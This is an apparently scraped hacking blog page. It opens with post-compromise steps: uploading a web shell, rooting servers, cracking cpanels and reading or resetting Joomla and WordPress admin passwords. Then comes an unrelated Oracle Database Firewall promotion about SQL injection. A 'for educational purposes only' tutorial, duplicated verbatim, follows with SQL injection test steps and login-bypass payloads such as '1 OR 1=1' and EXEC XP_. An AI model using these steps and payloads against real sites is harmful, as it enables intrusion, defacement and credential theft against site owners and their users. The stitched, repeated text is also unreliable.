Once you Got admin access, upload the shell! download shells from here, if you don’t have any Uploaded shell, Now what ? Now Take down you Target, you can either root the server or crack cpanels or do mass symlink on server once you got access to website’s database use mysql connect in table and read admin password in tables, you can remotely change password for joomla and wordpress now you have access on server, do whatever you want, Its really simple ? Yeah, That’s why most Hackers Hack/deface/root or whatever they do to website!
Thousands of organizations worldwide have been attacked by SQL injections. Why? Because hackers successfully exploit the trusted relationship between the application tier and the back-end database. Unfortunately, traditional security solutions cannot prevent these breaches. Oracle Database Firewall has unprecedented capabilities to defend against SQL injection attacks and prevent other threats from reaching your databases.
Key Concepts of a SQL Injection Attack
SQL injection is a software vulnerability that occurs when data entered by users is sent to the SQL interpreter as a part of an SQL query.
Attackers utilize this vulnerability by providing specially crafted input data to the SQL interpreter in such a manner that the interpreter is not able to distinguish between the intended commands and the attacker’s specially crafted data. The interpreter is tricked into executing unintended commands.
A SQL Injection attack exploits security vulnerabilities at the database layer. By exploiting the SQL injection flaw, attackers can create, read, modify, or delete sensitive data.
FOR EDUCATIONAL PURPOSES ONLY
I AM NOT RESPONSIBLE FOR ANY STUFF
IF YOU ARE CAUGHT PUNISHMENT FOR THIS IS VERY SEVERE SO YOU ARE RESOPONSIBLE
Websites like :-
http://www.hackingstuffs.com/items.php?id=5
put at last a quote ‘
http://www.hackingstuffs.com/items.php?id=5′
if it shows error , YOU ARE LUCKY (error like syntax error , error on line table_name or any thing)
FIND LOGIN PAGE(it’s difficult)
username and password use this:-
1) 1 OR 1=1
2) 1' OR '1'='1
3) 1’1
4) 1 EXEC SP_ (or EXEC XP_)
5) 1 AND 1=1
6) 1′ AND 1=(SELECT COUNT(*) FROM tablenames); –
7) more from this website http://ckers.org/sqlinjection/
enjoy J
FOR EDUCATIONAL PURPOSES ONLY
I AM NOT RESPONSIBLE FOR ANY STUFF
IF YOU ARE CAUGHT PUNISHMENT FOR THIS IS VERY SEVERE SO YOU ARE RESOPONSIBLE
Websites like :-
http://www.hackingstuffs.com/items.php?id=5
put at last a quote ‘
http://www.hackingstuffs.com/items.php?id=5′
if it shows error , YOU ARE LUCKY (error like syntax error , error on line table_name or any thing)
FIND LOGIN PAGE(it’s difficult)
username and password use this:-
1) 1 OR 1=1
2) 1' OR '1'='1
3) 1’1
4) 1 EXEC SP_ (or EXEC XP_)
5) 1 AND 1=1
6) 1′ AND 1=(SELECT COUNT(*) FROM tablenames); –
7) more from this website http://ckers.org/sqlinjection/
enjoy J
.jpg)
0 comments:
Post a Comment